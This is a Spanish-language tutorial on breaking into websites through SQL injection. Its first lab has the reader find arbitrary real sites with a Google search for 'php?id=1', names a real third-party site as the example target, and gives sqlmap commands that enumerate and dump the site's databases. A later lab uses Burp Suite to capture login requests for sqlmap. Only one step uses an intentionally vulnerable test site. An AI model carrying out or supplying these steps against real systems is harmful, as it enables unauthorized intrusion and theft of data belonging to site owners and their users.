Como Vulnerar un Sitio Web
LABORATORIO 1 (INYECCION VIA SQLMAP CON METODO GET)
- Abrimos el navegador y vamos a Google.com
- Buscamos php?id=1 y elegimos alguno de los resultados
EJEMPLO: https://www.burobd.org/network-and-linkages.php?id=8
- Y para saber si el sitio es vulnerable al final de la URL agregamos ‘
- Si es vulnerable nos debe mandar un error relacionado a “Error SQL Syntax”
- Si es así copiamos el enlace original de la página y en la terminal ejecutamos:
sqlmap -u <URL> --dbs - Al final del análisis se nos mostraran las BD disponibles, en nuestro ejemplo nos interesa burobd_bd_2025 por lo que ejecutamos:
sqlmap -u <URL> -D <BDName> --tables - Obtenidas las tablas ahora queremos mostrar el contenido de una de ellas:
sqlmap -u <URL> -D <BDName> -T <tableName> --columns - Y ahora volcaremos estas columnas que elegiremos a nuestra maquina
sqlmap -u <URL> -D <BDName> -T <tableName> -C <col1,col2,etc> --dump - Copiamos la dirección donde se nos guardó el volcado y en otra terminal lo abrimos con leafpad
leafpad <UBICACION> - Veremos los datos obtenidos de la tabla en la base de datos
SEGUNDO SITIO DE PRUEBA
- Vamos a ir a un sitio web intencionalmente vulnerable
testphp.vulnweb.com/index.php - Navegamos un poco en la web y copiamos una de sus URL
- Y en la terminal podemos hacer lo mismo que en la PRACTICA 1
LABORATORIO 2 (INYECCION VIA SQLMAP CON METODO POST)
- Abrimos Burp Suite, seleccionamos un proyecto temporal, lo iniciamos y en Proxy>Intercept>Intercept On
- Y ahora redirigiremos el tráfico configurando nuestro PROXY en el navegador>Ajustes/Preferencias>Proxy>Settings>Manual proxy
- HTTP Proxy: 127.0.0.1
- Port: 8080
- HTTPS Proxy:127.0.0.1
- Port: 8080
- Abrimos en Burp los Proxy Settings>Export CA Certificate>Certificate in DER format
- Guardamos el documento en el escritorio con la extensión .der
- Abrimos el navegador>Ajustes>Certificates>View>Authorities>import
- Seleccionamos nuestro documento antes guardado y se habrá importado el certificado
- Y ahora todo el tráfico ira al servidor proxy antes que llegue a internet
- Nos vamos a una página vulnerable o que use POST(Login)
- Tratamos de logearnos con datos aleatorios
- Abrimos Burp Suite y nos vamos a HTTP History
- Buscamos el host al que entramos antes con POST, seleccionamos y en la parte inferior tendremos más información que seleccionaremos completamente, clic derecho y Copy To File
- Guardaremos el texto como sqli.txt y abriremos la terminal
- Ejecutamos sqlmap -r <ubicacionDeNuestroTxt>
- Comenzaremos a buscar vulnerabilidades como en la PRACTICA 1 y 2 para tratar de obtener la BD
EXTRAS (Pruebas a otras Paginas)